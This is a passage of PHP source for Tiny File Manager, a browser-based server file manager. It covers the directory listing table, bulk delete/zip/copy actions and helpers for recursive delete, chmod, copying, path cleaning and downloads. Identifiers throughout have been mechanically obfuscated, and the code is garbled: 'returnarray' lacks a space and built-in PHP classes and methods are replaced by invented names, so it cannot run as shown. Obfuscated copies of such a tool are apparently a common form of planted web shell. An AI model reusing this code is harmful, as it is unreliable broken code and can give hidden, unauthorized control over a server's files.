  420.                         <button type="submit" class="btn btn-success"><i class="fa fa-check-circle"></i> <?php echo z57('Change')?></button>
  421.                     </p>
  422.                 </form>
  423.             </div>
  424.         </div>
  425.     </div>
  426.     <?php t56();exit;}v55();b51(FM_PATH);k52();$j242=count($t171);$d243=count($q208);$y244=0;$r245=(FM_THEME=="dark")?"text-white bg-dark table-dark":"bg-white";?>
  427. <form action="" method="post" class="pt-3">
  428.     <input type="hidden" name="p" value="<?php echo w27(FM_PATH)?>">
  429.     <input type="hidden" name="group" value="1">
  430.     <input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>">
  431.     <div class="table-responsive">
  432.         <table class="table table-bordered table-hover table-sm <?php echo $r245;?>" id="main-table">
  433.             <thead class="thead-white">
  434.             <tr>
  435.                 <?php if(!FM_READONLY):?>
  436.                     <th style="width:3%" class="custom-checkbox-header">
  437.                         <div class="custom-control custom-checkbox">
  438.                             <input type="checkbox" class="custom-control-input" id="js-select-all-items" onclick="checkbox_toggle()">
  439.                             <label class="custom-control-label" for="js-select-all-items"></label>
  440.                         </div>
  441.                     </th><?php endif;?>
  442.                 <th><?php echo z57('Name')?></th>
  443.                 <th><?php echo z57('Size')?></th>
  444.                 <th><?php echo z57('Modified')?></th>
  445.                 <?php if(!FM_IS_WIN&&!$a93):?>
  446.                     <th><?php echo z57('Perms')?></th>
  447.                     <th><?php echo z57('Owner')?></th><?php endif;?>
  448.                 <th><?php echo z57('Actions')?></th>
  449.             </tr>
  450.             </thead>
  451.             <?php if($f206!==false){?>
  452.                 <tr><?php if(!FM_READONLY):?>
  453.                     <td class="nosort"></td><?php endif;?>
  454.                     <td class="border-0" data-sort><a href="?p=<?php echo urlencode($f206)?>"><i class="fa fa-chevron-circle-left go-back"></i> ..</a></td>
  455.                     <td class="border-0" data-order></td>
  456.                     <td class="border-0" data-order></td>
  457.                     <td class="border-0"></td>
  458.                     <?php if(!FM_IS_WIN&&!$a93){?>
  459.                         <td class="border-0"></td>
  460.                         <td class="border-0"></td>
  461.                     <?php }?>
  462.                 </tr>
  463.                 <?php }$x246=3399;foreach($q208 as $l172){$m247=is_link($h110.'/'.$l172);$x248=$m247?'icon-link_folder':'fa fa-folder-o';$i249=filemtime($h110.'/'.$l172);$l250=date(FM_DATETIME_FORMAT,$i249);$z251=strtotime(date("F d Y H:i:s.",$i249));$j219="";$c220=z57('Folder');$b252=substr(decoct(fileperms($h110.'/'.$l172)),-4);if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid')){$i253=posix_getpwuid(fileowner($h110.'/'.$l172));$y254=posix_getgrgid(filegroup($h110.'/'.$l172));}else{$i253=array('name'=>'?');$y254=array('name'=>'?');}?>
  464.                 <tr>
  465.                     <?php if(!FM_READONLY):?>
  466.                         <td class="custom-checkbox-td">
  467.                         <div class="custom-control custom-checkbox">
  468.                             <input type="checkbox" class="custom-control-input" id="<?php echo $x246 ?>" name="file[]" value="<?php echo w27($l172)?>">
  469.                             <label class="custom-control-label" for="<?php echo $x246 ?>"></label>
  470.                         </div>
  471.                         </td><?php endif;?>
  472.                     <td data-sort=<?php echo h31(w27($l172))?>>
  473.                         <div class="filename"><a href="?p=<?php echo urlencode(trim(FM_PATH.'/'.$l172,'/'))?>"><i class="<?php echo $x248 ?>"></i> <?php echo h31(w27($l172))?>
  474.                             </a><?php echo($m247?' &rarr; <i>'.readlink($h110.'/'.$l172).'</i>':'')?></div>
  475.                     </td>
  476.                     <td data-order="a-<?php echo str_pad($j219,18,"0",STR_PAD_LEFT);?>">
  477.                         <?php echo $c220;?>
  478.                     </td>
  479.                     <td data-order="a-<?php echo $z251;?>"><?php echo $l250 ?></td>
  480.                     <?php if(!FM_IS_WIN&&!$a93):?>
  481.                         <td><?php if(!FM_READONLY):?><a title="Change Permissions" href="?p=<?php echo urlencode(FM_PATH)?>&amp;chmod=<?php echo urlencode($l172)?>"><?php echo $b252 ?></a><?php else:?><?php echo $b252 ?><?php endif;?>
  482.                         </td>
  483.                         <td><?php echo $i253['name'].':'.$y254['name']?></td>
  484.                     <?php endif;?>
  485.                     <td class="inline-actions"><?php if(!FM_READONLY):?>
  486.                             <a title="<?php echo z57('Delete')?>" href="?p=<?php echo urlencode(FM_PATH)?>&amp;del=<?php echo urlencode($l172)?>" onclick="confirmDailog(event, '1028','<?php echo z57('Delete').' '.z57('Folder');?>','<?php echo urlencode($l172)?>', this.href);"> <i class="fa fa-trash-o" aria-hidden="true"></i></a>
  487.                             <a title="<?php echo z57('Rename')?>" href="#" onclick="rename('<?php echo w27(addslashes(FM_PATH))?>', '<?php echo w27(addslashes($l172))?>');return false;"><i class="fa fa-pencil-square-o" aria-hidden="true"></i></a>
  488.                             <a title="<?php echo z57('CopyTo')?>..." href="?p=&amp;copy=<?php echo urlencode(trim(FM_PATH.'/'.$l172,'/'))?>"><i class="fa fa-files-o" aria-hidden="true"></i></a>
  489.                         <?php endif;?>
  490.                         <a title="<?php echo z57('DirectLink')?>" href="<?php echo w27(FM_ROOT_URL.(FM_PATH!=''?'/'.FM_PATH:'').'/'.$l172.'/')?>" target="_blank"><i class="fa fa-link" aria-hidden="true"></i></a>
  491.                     </td>
  492.                 </tr>
  493.                 <?php flush();$x246++;}$o255=6070;foreach($t171 as $l172){$m247=is_link($h110.'/'.$l172);$x248=$m247?'fa fa-file-text-o':v33($h110.'/'.$l172);$i249=filemtime($h110.'/'.$l172);$l250=date(FM_DATETIME_FORMAT,$i249);$z251=strtotime(date("F d Y H:i:s.",$i249));$j219=k23($h110.'/'.$l172);$c220=o24($j219);$c256='?p='.urlencode(FM_PATH).'&amp;view='.urlencode($l172);$y244+=$j219;$b252=substr(decoct(fileperms($h110.'/'.$l172)),-4);if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid')){$i253=posix_getpwuid(fileowner($h110.'/'.$l172));$y254=posix_getgrgid(filegroup($h110.'/'.$l172));}else{$i253=array('name'=>'?');$y254=array('name'=>'?');}?>
  494.                 <tr>
  495.                     <?php if(!FM_READONLY):?>
  496.                         <td class="custom-checkbox-td">
  497.                         <div class="custom-control custom-checkbox">
  498.                             <input type="checkbox" class="custom-control-input" id="<?php echo $o255 ?>" name="file[]" value="<?php echo w27($l172)?>">
  499.                             <label class="custom-control-label" for="<?php echo $o255 ?>"></label>
  500.                         </div>
  501.                         </td><?php endif;?>
  502.                     <td data-sort=<?php echo w27($l172)?>>
  503.                         <div class="filename">
  504.                         <?php if(in_array(strtolower(pathinfo($l172,PATHINFO_EXTENSION)),array('gif','jpg','jpeg','png','bmp','ico','svg','webp','avif'))):?>
  505.                                 <?php $s257=w27(FM_ROOT_URL.(FM_PATH!=''?'/'.FM_PATH:'').'/'.$l172);?>
  506.                                 <a href="<?php echo $c256 ?>" data-preview-image="<?php echo $s257 ?>" title="<?php echo w27($l172)?>">
  507.                            <?php else:?>
  508.                                 <a href="<?php echo $c256 ?>" title="<?php echo $l172 ?>">
  509.                             <?php endif;?>
  510.                                     <i class="<?php echo $x248 ?>"></i> <?php echo h31(w27($l172))?>
  511.                                 </a>
  512.                                 <?php echo($m247?' &rarr; <i>'.readlink($h110.'/'.$l172).'</i>':'')?>
  513.                         </div>
  514.                     </td>
  515.                     <td data-order="b-<?php echo str_pad($j219,18,"0",STR_PAD_LEFT);?>"><span title="<?php printf('%s bytes',$j219)?>">
  516.                         <?php echo $c220;?>
  517.                         </span></td>
  518.                     <td data-order="b-<?php echo $z251;?>"><?php echo $l250 ?></td>
  519.                     <?php if(!FM_IS_WIN&&!$a93):?>
  520.                         <td><?php if(!FM_READONLY):?><a title="<?php echo 'Change Permissions' ?>" href="?p=<?php echo urlencode(FM_PATH)?>&amp;chmod=<?php echo urlencode($l172)?>"><?php echo $b252 ?></a><?php else:?><?php echo $b252 ?><?php endif;?>
  521.                         </td>
  522.                         <td><?php echo w27($i253['name'].':'.$y254['name'])?></td>
  523.                     <?php endif;?>
  524.                     <td class="inline-actions">
  525.                         <?php if(!FM_READONLY):?>
  526.                             <a title="<?php echo z57('Delete')?>" href="?p=<?php echo urlencode(FM_PATH)?>&amp;del=<?php echo urlencode($l172)?>" onclick="confirmDailog(event, 1209, '<?php echo z57('Delete').' '.z57('File');?>','<?php echo urlencode($l172);?>', this.href);"> <i class="fa fa-trash-o"></i></a>
  527.                             <a title="<?php echo z57('Rename')?>" href="#" onclick="rename('<?php echo w27(addslashes(FM_PATH))?>', '<?php echo w27(addslashes($l172))?>');return false;"><i class="fa fa-pencil-square-o"></i></a>
  528.                             <a title="<?php echo z57('CopyTo')?>..."
  529.                                href="?p=<?php echo urlencode(FM_PATH)?>&amp;copy=<?php echo urlencode(trim(FM_PATH.'/'.$l172,'/'))?>"><i class="fa fa-files-o"></i></a>
  530.                         <?php endif;?>
  531.                         <a title="<?php echo z57('DirectLink')?>" href="<?php echo w27(FM_ROOT_URL.(FM_PATH!=''?'/'.FM_PATH:'').'/'.$l172)?>" target="_blank"><i class="fa fa-link"></i></a>
  532.                         <a title="<?php echo z57('Download')?>" href="?p=<?php echo urlencode(FM_PATH)?>&amp;dl=<?php echo urlencode($l172)?>" onclick="confirmDailog(event, 1211, '<?php echo z57('Download');?>','<?php echo urlencode($l172);?>', this.href);"><i class="fa fa-download"></i></a>
  533.                     </td>
  534.                 </tr>
  535.                 <?php flush();$o255++;}if(empty($q208)&&empty($t171)){?>
  536.                 <tfoot>
  537.                     <tr><?php if(!FM_READONLY):?>
  538.                             <td></td><?php endif;?>
  539.                         <td colspan="<?php echo(!FM_IS_WIN&&!$a93)?'6':'4' ?>"><em><?php echo z57('Folder is empty')?></em></td>
  540.                     </tr>
  541.                 </tfoot>
  542.                 <?php }else{?>
  543.                 <tfoot>
  544.                     <tr>
  545.                         <td class="gray" colspan="<?php echo(!FM_IS_WIN&&!$a93)?(FM_READONLY?'6':'7'):(FM_READONLY?'4':'5')?>">
  546.                             <?php echo z57('FullSize').': <span class="badge text-bg-light border-radius-0">'.o24($y244).'</span>' ?>
  547.                             <?php echo z57('File').': <span class="badge text-bg-light border-radius-0">'.$j242.'</span>' ?>
  548.                             <?php echo z57('Folder').': <span class="badge text-bg-light border-radius-0">'.$d243.'</span>' ?>
  549.                         </td>
  550.                     </tr>
  551.                 </tfoot>
  552.                 <?php }?>
  553.         </table>
  554.     </div>
  555.  
  556.     <div class="row">
  557.         <?php if(!FM_READONLY):?>
  558.         <div class="col-xs-12 col-sm-9">
  559.             <ul class="list-inline footer-action">
  560.                 <li class="list-inline-item"> <a href="#/select-all" class="btn btn-small btn-outline-primary btn-2" onclick="select_all();return false;"><i class="fa fa-check-square"></i> <?php echo z57('SelectAll')?> </a></li>
  561.                 <li class="list-inline-item"><a href="#/unselect-all" class="btn btn-small btn-outline-primary btn-2" onclick="unselect_all();return false;"><i class="fa fa-window-close"></i> <?php echo z57('UnSelectAll')?> </a></li>
  562.                 <li class="list-inline-item"><a href="#/invert-all" class="btn btn-small btn-outline-primary btn-2" onclick="invert_all();return false;"><i class="fa fa-th-list"></i> <?php echo z57('InvertSelection')?> </a></li>
  563.                 <li class="list-inline-item"><input type="submit" class="hidden" name="delete" id="a-delete" value="Delete" onclick="return confirm('<?php echo z57('Delete selected files and folders?');?>')">
  564.                     <a href="javascript:document.getElementById('a-delete').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-trash"></i> <?php echo z57('Delete')?> </a></li>
  565.                 <li class="list-inline-item"><input type="submit" class="hidden" name="zip" id="a-zip" value="zip" onclick="return confirm('<?php echo z57('Create archive?');?>')">
  566.                     <a href="javascript:document.getElementById('a-zip').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-file-archive-o"></i> <?php echo z57('Zip')?> </a></li>
  567.                 <li class="list-inline-item"><input type="submit" class="hidden" name="tar" id="a-tar" value="tar" onclick="return confirm('<?php echo z57('Create archive?');?>')">
  568.                     <a href="javascript:document.getElementById('a-tar').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-file-archive-o"></i> <?php echo z57('Tar')?> </a></li>
  569.                 <li class="list-inline-item"><input type="submit" class="hidden" name="copy" id="a-copy" value="Copy">
  570.                     <a href="javascript:document.getElementById('a-copy').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-files-o"></i> <?php echo z57('Copy')?> </a></li>
  571.             </ul>
  572.         </div>
  573.         <div class="col-3 d-none d-sm-block"><a href="https://tinyfilemanager.github.io" target="_blank" class="float-right text-muted">Tiny File Manager <?php echo VERSION;?></a></div>
  574.         <?php else:?>
  575.             <div class="col-12"><a href="https://tinyfilemanager.github.io" target="_blank" class="float-right text-muted">Tiny File Manager <?php echo VERSION;?></a></div>
  576.         <?php endif;?>
  577.     </div>
  578. </form>
  579.  
  580. <?php t56();/**
  581.  * It prints the css/js files into html
  582.  * @param key The key of the external file to print.
  583.  * @return The value of the key in the  array.
  584.  */ function m7($v258){global $i85;if(!array_key_exists($v258,$i85)){echo"<!-- EXTERNAL: MISSING KEY $v258 -->";return;}echo"$i85[$v258]";}/**
  585.  * Verify CSRF TOKEN and remove after cerify
  586.  * @param string $token
  587.  * @return bool
  588.  */ function k8($o259){if(hash_equals($_SESSION['token'],$o259)){return true;}return false;}/**
  589.  * Delete  file or folder (recursively)
  590.  * @param string $path
  591.  * @return bool
  592.  */ function n9($h110){if(is_link($h110)){return unlink($h110);}elseif(is_dir($h110)){$x207=scandir($h110);$k260=true;if(is_array($x207)){foreach($x207 as $b98){if($b98!='.'&&$b98!='..'){if(!n9($h110.'/'.$b98)){$k260=false;}}}}return($k260)?rmdir($h110):false;}elseif(is_file($h110)){return unlink($h110);}return false;}/**
  593.  * Recursive chmod
  594.  * @param string $path
  595.  * @param int $filemode
  596.  * @param int $dirmode
  597.  * @return bool
  598.  * @todo Will use in mass chmod
  599.  */ function d10($h110,$s261,$k262){if(is_dir($h110)){if(!chmod($h110,$k262)){return false;}$x207=scandir($h110);if(is_array($x207)){foreach($x207 as $b98){if($b98!='.'&&$b98!='..'){if(!d10($h110.'/'.$b98,$s261,$k262)){return false;}}}}return true;}elseif(is_link($h110)){return true;}elseif(is_file($h110)){return chmod($h110,$s261);}return false;}/**
  600.  * Check the file extension which is allowed or not
  601.  * @param string $filename
  602.  * @return bool
  603.  */ function z11($p181){$i143=(FM_FILE_EXTENSION)?explode(',',FM_FILE_EXTENSION):false;$w144=pathinfo($p181,PATHINFO_EXTENSION);$l145=($i143)?in_array($w144,$i143):true;return($l145)?true:false;}/**
  604.  * Safely rename
  605.  * @param string $old
  606.  * @param string $new
  607.  * @return bool|null
  608.  */ function c12($o173,$s156){$l145=z11($s156);if(!is_dir($o173)){if(!$l145)return false;}return(!file_exists($s156)&&file_exists($o173))?rename($o173,$s156):null;}/**
  609.  * Copy file or folder (recursively).
  610.  * @param string $path
  611.  * @param string $dest
  612.  * @param bool $upd Update files
  613.  * @param bool $force Create folder with same names instead file
  614.  * @return bool
  615.  */ function p13($h110,$i159,$c263=true,$i264=true){if(is_dir($h110)){if(!n14($i159,$i264)){return false;}$x207=scandir($h110);$k260=true;if(is_array($x207)){foreach($x207 as $b98){if($b98!='.'&&$b98!='..'){if(!p13($h110.'/'.$b98,$i159.'/'.$b98)){$k260=false;}}}}return $k260;}elseif(is_file($h110)){return t15($h110,$i159,$c263);}return false;}/**
  616.  * Safely create folder
  617.  * @param string $dir
  618.  * @param bool $force
  619.  * @return bool
  620.  */ function n14($s108,$i264){if(file_exists($s108)){if(is_dir($s108)){return $s108;}elseif(!$i264){return false;}unlink($s108);}return mkdir($s108,0777,true);}/**
  621.  * Safely copy file
  622.  * @param string $f1
  623.  * @param string $f2
  624.  * @param bool $upd Indicates if file should be updated with new content
  625.  * @return bool
  626.  */ function t15($t265,$n266,$c263){$t267=filemtime($t265);if(file_exists($n266)){$k268=filemtime($n266);if($k268>=$t267&&$c263){return false;}}$k260=copy($t265,$n266);if($k260){touch($n266,$t267);}return $k260;}/**
  627.  * Get mime type
  628.  * @param string $file_path
  629.  * @return mixed|string
  630.  */ function o16($c112){if(function_exists('finfo_open')){$m269=finfo_open(FILEINFO_MIME_TYPE);$i270=finfo_file($m269,$c112);finfo_close($m269);return $i270;}elseif(function_exists('mime_content_type')){return mime_content_type($c112);}elseif(!stristr(ini_get('disable_functions'),'shell_exec')){$b98=escapeshellarg($c112);$i270=shell_exec('file -bi '.$b98);return $i270;}else{return '--';}}/**
  631.  * HTTP Redirect
  632.  * @param string $url
  633.  * @param int $code
  634.  */ function b17($e136,$e96=302){header('Location: '.$e136,true,$e96);exit;}/**
  635.  * Path traversal prevention and clean the url
  636.  * It replaces (consecutive) occurrences of / and \\ with whatever is in DIRECTORY_SEPARATOR, and processes /. and /.. fine.
  637.  * @param $path
  638.  * @return string
  639.  */ function l18($h110){$h110=str_replace(array('/','\\'),DIRECTORY_SEPARATOR,$h110);$s271=array_filter(explode(DIRECTORY_SEPARATOR,$h110),'strlen');$s272=array();foreach($s271 as $x273){if('.'==$x273)continue;if('..'==$x273){array_pop($s272);}else{$s272[]=$x273;}}return x5(DIRECTORY_SEPARATOR,$s272);}/**
  640.  * Clean path
  641.  * @param string $path
  642.  * @return string
  643.  */ function s19($h110,$d274=true){$h110=$d274?trim($h110):$h110;$h110=trim($h110,'\\/');$h110=str_replace(array('../','..\\'),'',$h110);$h110=l18($h110);if($h110=='..'){$h110='';}return str_replace('\\','/',$h110);}/**
  644.  * Get parent path
  645.  * @param string $path
  646.  * @return bool|string
  647.  */ function l20($h110){$h110=s19($h110);if($h110!=''){$r275=explode('/',$h110);if(count($r275)>1){$r275=array_slice($r275,0,-1);return x5('/',$r275);}return '';}return false;}/**
  648.  * Check file is in exclude list
  649.  * @param string $file
  650.  * @return bool
  651.  */ function c21($b98){$w144=strtolower(pathinfo($b98,PATHINFO_EXTENSION));if(isset($h76)and sizeof($h76)){unset($h76);}$h76=FM_EXCLUDE_ITEMS;if(version_compare(PHP_VERSION,'7.0.0','<')){$h76=unserialize($h76);}if(!in_array($b98,$h76)&&!in_array("*.$w144",$h76)){return true;}return false;}/**
  652.  * get language translations from json file
  653.  * @param int $tr
  654.  * @return array
  655.  */ function b22($k276){try{$l230=@file_get_contents('translation.json');if($l230!==FALSE){$y277=json_decode($l230,TRUE);global $e95;foreach($y277["language"]as $v258=>$p278){$e96=$p278["code"];$e95[$e96]=$p278["name"];if($k276)$k276[$e96]=$p278["translation"];}return $k276;}}catch(Exception $d123){echo $d123;}}/**
  656.  * @param string $file
  657.  * Recover all file sizes larger than > 2GB.
  658.  * Works on php 32bits and 64bits and supports linux
  659.  * @return int|string
  660.  */ function k23($b98){static $u279;static $y280;if(!isset($u279)){$u279=(strtoupper(substr(PHP_OS,0,3))=='WIN');}if(!isset($y280)){$y280=(strtoupper(substr(PHP_OS,0))=="DARWIN");}static $m281;if(!isset($m281)){$m281=(function_exists('exec')&&!ini_get('safe_mode')&&@exec('echo EXEC')=='EXEC');}if($m281){$x282=escapeshellarg($b98);$d283=($u279)?"for %F in (\"$b98\") do @echo %~zF":($y280?"stat -f%z $x282":"stat -c%s $x282");@exec($d283,$s284);if(is_array($s284)&&ctype_digit($p285=trim(x5("\n",$s284)))){return $p285;}}if($u279&&class_exists("COM")){try{$w286=new x287('Scripting.FileSystemObject');$l172=$w286->t288(realpath($b98));$p285=$l172->$j150;}catch(Exception $d123){$p285=null;}if(ctype_digit($p285)){return $p285;}}return filesize($b98);}/**
  661.  * Get nice filesize
  662.  * @param int $size
  663.  * @return string
  664.  */ function o24($p285){$p285=(float)$p285;$l289=array('B','KB','MB','GB','TB','PB','EB','ZB','YB');$z290=($p285>0)?floor(log($p285,1024)):0;$z290=($z290>(count($l289)-1))?(count($l289)-1):$z290;return sprintf('%s %s',round($p285/pow(1024,$z290),2),$l289[$z290]);}/**
  665.  * Get total size of directory tree.
  666.  *
  667.  * @param  string $directory Relative or absolute directory name.
  668.  * @return int Total number of bytes.
  669.  */ function a25($s291){$z292=0;$s291=realpath($s291);if($s291!==false&&$s291!=''&&file_exists($s291)){foreach(new q293(new u294($s291,FilesystemIterator::SKIP_DOTS))as $b98){$z292+=$b98->p295();}}return $z292;}/**
  670.  * Get info about zip archive
  671.  * @param string $path
  672.  * @return array|bool
  673.  */ function w26($h110,$w144){if($w144=='zip'&&function_exists('zip_open')){$z296=@zip_open($h110);if($z296){$u229=array();while($n297=@zip_read($z296)){$r237=@zip_entry_name($n297);$v298=substr($r237,-1)=='/';$u229[]=array('name'=>$r237,'filesize'=>@zip_entry_filesize($n297),'compressed_size'=>@zip_entry_compressedsize($n297),'folder'=>$v298 );}@zip_close($z296);return $u229;}}elseif($w144=='tar'&&class_exists('PharData')){$r299=new y203($h110);$u229=array();foreach(new q293($r299)as $b98){$l300=$b98->x301();$r237=str_replace("phar://".$h110,'',$b98->i302());$r237=substr($r237,($i303=strpos($r237,'/'))!==false?$i303+1:0);$v298=$l300->e304();$g305=new i306($b98);$u229[]=array('name'=>$r237,'filesize'=>$g305->p295(),'compressed_size'=>$b98->m307(),'folder'=>$v298);}return $u229;}return false;}/**
  674.  * Encode html entities
  675.  * @param string $text
  676.  * @return string
  677.  */ function w27($b308){return htmlspecialchars($b308,ENT_QUOTES,'UTF-8');}/**
  678.  * Prevent XSS attacks
  679.  * @param string $text
  680.  * @return string
  681.  */ function m28($b308){return(strpbrk($b308,'/?%*:|"<>')===FALSE)?true:false;}/**
  682.  * Save message in session
  683.  * @param string $msg
  684.  * @param string $status
  685.  */ function i29($b97,$u309='ok'){$_SESSION[FM_SESSION_ID]['message']=$b97;$_SESSION[FM_SESSION_ID]['status']=$u309;}/**
  686.  * Check if string is in UTF-8
  687.  * @param string $string
  688.  * @return int
  689.  */ function q30($a310){return preg_match('//u',$a310);}/**
  690.  * Convert file name to UTF-8 in Windows
  691.  * @param string $filename
  692.  * @return string
  693.  */ function h31($p181){if(FM_IS_WIN&&function_exists('iconv')){$p181=iconv(FM_ICONV_INPUT_ENC,'UTF-8//IGNORE',$p181);}return $p181;}/**
  694.  * @param $obj
  695.  * @return array
  696.  */ function s32($n311){if(!is_object($n311)&&!is_array($n311)){return $n311;}if(is_object($n311)){$n311=get_object_vars($n311);}return array_map('fm_object_to_array',$n311);}/**
  697.  * Get CSS classname for file
  698.  * @param string $path
  699.  * @return string
  700.  */ function v33($h110){$w144=strtolower(pathinfo($h110,PATHINFO_EXTENSION));switch($w144){case 'ico':case 'gif':case 'jpg':case 'jpeg':case 'jpc':case 'jp2':case 'jpx':case 'xbm':case 'wbmp':case 'png':case 'bmp':case 'tif':case 'tiff':case 'webp':case 'avif':case 'svg':$x248='fa fa-picture-o';break;case 'passwd':case 'ftpquota':case 'sql':case 'js':case 'ts':case 'jsx':case 'tsx':case 'hbs':case 'json':case 'sh':case 'config':case 'twig':case 'tpl':case 'md':case 'gitignore':case 'c':case 'cpp':case 'cs':case 'py':case 'rs':case 'map':case 'lock':case 'dtd':$x248='fa fa-file-code-o';break;case 'txt':case 'ini':case 'conf':case 'log':case 'htaccess':case 'yaml':case 'yml':case 'toml':case 'tmp':case 'top':case 'bot':case 'dat':case 'bak':case 'htpasswd':case 'pl':$x248='fa fa-file-text-o';break;case 'css':case 'less':case 'sass':case 'scss':$x248='fa fa-css3';break;case 'bz2':case 'zip':case 'rar':case 'gz':case 'tar':case '7z':case 'xz':$x248='fa fa-file-archive-o';break;case 'php':case 'php4':case 'php5':case 'phps':case 'phtml':$x248='fa fa-code';break;case 'htm':case 'html':case 'shtml':case 'xhtml':$x248='fa fa-html5';break;case 'xml':case 'xsl':$x248='fa fa-file-excel-o';break;case 'wav':case 'mp3':case 'mp2':case 'm4a':case 'aac':case 'ogg':case 'oga':case 'wma':case 'mka':case 'flac':case 'ac3':case 'tds':$x248='fa fa-music';break;case 'm3u':case 'm3u8':case 'pls':case 'cue':case 'xspf':$x248='fa fa-headphones';break;case 'avi':case 'mpg':case 'mpeg':case 'mp4':case 'm4v':case 'flv':case 'f4v':case 'ogm':case 'ogv':case 'mov':case 'mkv':case '3gp':case 'asf':case 'wmv':case 'webm':$x248='fa fa-file-video-o';break;case 'eml':case 'msg':$x248='fa fa-envelope-o';break;case 'xls':case 'xlsx':case 'ods':$x248='fa fa-file-excel-o';break;case 'csv':$x248='fa fa-file-text-o';break;case 'bak':case 'swp':$x248='fa fa-clipboard';break;case 'doc':case 'docx':case 'odt':$x248='fa fa-file-word-o';break;case 'ppt':case 'pptx':$x248='fa fa-file-powerpoint-o';break;case 'ttf':case 'ttc':case 'otf':case 'woff':case 'woff2':case 'eot':case 'fon':$x248='fa fa-font';break;case 'pdf':$x248='fa fa-file-pdf-o';break;case 'psd':case 'ai':case 'eps':case 'fla':case 'swf':$x248='fa fa-file-image-o';break;case 'exe':case 'msi':$x248='fa fa-file-o';break;case 'bat':$x248='fa fa-terminal';break;default:$x248='fa fa-info-circle';}return $x248;}/**
  701.  * Get image files extensions
  702.  * @return array
  703.  */ function m34(){returnarray('ico','gif','jpg','jpeg','jpc','jp2','jpx','xbm','wbmp','png','bmp','tif','tiff','psd','svg','webp','avif');}/**
  704.  * Get video files extensions
  705.  * @return array
  706.  */ function u35(){returnarray('avi','webm','wmv','mp4','m4v','ogm','ogv','mov','mkv');}/**
  707.  * Get audio files extensions
  708.  * @return array
  709.  */ function w36(){returnarray('wav','mp3','ogg','m4a');}/**
  710.  * Get text file extensions
  711.  * @return array
  712.  */ function v37(){returnarray('txt','css','ini','conf','log','htaccess','passwd','ftpquota','sql','js','ts','jsx','tsx','mjs','json','sh','config','php','php4','php5','phps','phtml','htm','html','shtml','xhtml','xml','xsl','m3u','m3u8','pls','cue','bash','vue','eml','msg','csv','bat','twig','tpl','md','gitignore','less','sass','scss','c','cpp','cs','py','go','zsh','swift','map','lock','dtd','svg','asp','aspx','asx','asmx','ashx','jsp','jspx','cgi','dockerfile','ruby','yml','yaml','toml','vhost','scpt','applescript','csx','cshtml','c++','coffee','cfm','rb','graphql','mustache','jinja','http','handlebars','java','es','es6','markdown','wiki','tmp','top','bot','dat','bak','htpasswd','pl');}/**
  713.  * Get mime types of text files
  714.  * @return array
  715.  */ function r38(){returnarray('application/xml','application/javascript','application/x-javascript','image/svg+xml','message/rfc822','application/json',);}/**
  716.  * Get file names of text files w/o extensions
  717.  * @return array
  718.  */ function v39(){returnarray('license','readme','authors','contributors','changelog',);}/**
  719.  * Get online docs viewer supported files extensions
  720.  * @return array
  721.  */ function p40(){returnarray('doc','docx','xls','xlsx','pdf','ppt','pptx','ai','psd','dxf','xps','rar','odt','ods');}/**
  722.  * It returns the mime type of a file based on its extension.
  723.  * @param extension The file extension of the file you want to get the mime type for.
  724.  * @return string|string[] The mime type of the file.
  725.  */ function v41($a312){$w313['swf']='application/x-shockwave-flash';$w313['pdf']='application/pdf';$w313['exe']='application/octet-stream';$w313['zip']='application/zip';$w313['doc']='application/msword';$w313['xls']='application/vnd.ms-excel';$w313['ppt']='application/vnd.ms-powerpoint';$w313['gif']='image/gif';$w313['png']='image/png';$w313['jpeg']='image/jpg';$w313['jpg']='image/jpg';$w313['webp']='image/webp';$w313['avif']='image/avif';$w313['rar']='application/rar';$w313['ra']='audio/x-pn-realaudio';$w313['ram']='audio/x-pn-realaudio';$w313['ogg']='audio/x-pn-realaudio';$w313['wav']='video/x-msvideo';$w313['wmv']='video/x-msvideo';$w313['avi']='video/x-msvideo';$w313['asf']='video/x-msvideo';$w313['divx']='video/x-msvideo';$w313['mp3']='audio/mpeg';$w313['mp4']='audio/mpeg';$w313['mpeg']='video/mpeg';$w313['mpg']='video/mpeg';$w313['mpe']='video/mpeg';$w313['mov']='video/quicktime';$w313['swf']='video/quicktime';$w313['3gp']='video/quicktime';$w313['m4a']='video/quicktime';$w313['aac']='video/quicktime';$w313['m3u']='video/quicktime';$w313['php']=['application/x-php'];$w313['html']=['text/html'];$w313['txt']=['text/plain'];if(empty($w313[$a312])){$w313[$a312]=['application/octet-stream'];}return $w313[$a312];}/**
  726.  * This function scans the files and folder recursively, and return matching files
  727.  * @param string $dir
  728.  * @param string $filter
  729.  * @return array|null
  730.  */ function e42($s108='',$p314=''){$h110=FM_ROOT_PATH.'/'.$s108;if($h110){$y315=new q293(new u294($h110));$n316=new a317($y315,"/(".$p314.")/i");$t171=array();foreach($n316 as $b98){if(!$b98->g318()){$o116=$b98->o319();$c320=str_replace(FM_ROOT_PATH,'',$b98->i321());$t171[]=array("name"=>$o116,"type"=>"file","path"=>$c320,);}}return $t171;}}/**
  731. * Parameters: downloadFile(File Location, File Name,
  732. * max speed, is streaming
  733. * If streaming - videos will show as videos, images as images
  734. * instead of download prompt
  735. * https://stackoverflow.com/a/13821992/1164642
  736. */ function v43($f322,$o116,$h323=1024){if(connection_status()!=0)return(false);$a312=pathinfo($o116,PATHINFO_EXTENSION);$j324=v41($a312);if(is_array($j324)){$j324=x5(' ',$j324);}$p285=filesize($f322);if($p285==0){i29(z57('Zero byte file! Aborting download'),'error');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));return(false);}@ini_set('magic_quotes_runtime',0);$e147=fopen("$f322","rb");if($e147===false){i29(z57('Cannot open file! Aborting download'),'error');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));return(false);}header('Content-Description: File Transfer');header('Expires: 0');header('Cache-Control: must-revalidate, post-check=0, pre-check=0');header('Pragma: public');header("Content-Transfer-Encoding: binary");header("Content-Type: $j324");$b325='attachment';if(strstr($_SERVER['HTTP_USER_AGENT'],"MSIE")){$o116=preg_replace('/\./','%2e',$o116,substr_count($o116,'.')-1);header("Content-Disposition: $b325;filename=\"$o116\"");}else{header("Content-Disposition: $b325;filename=\"$o116\"");}header("Accept-Ranges: 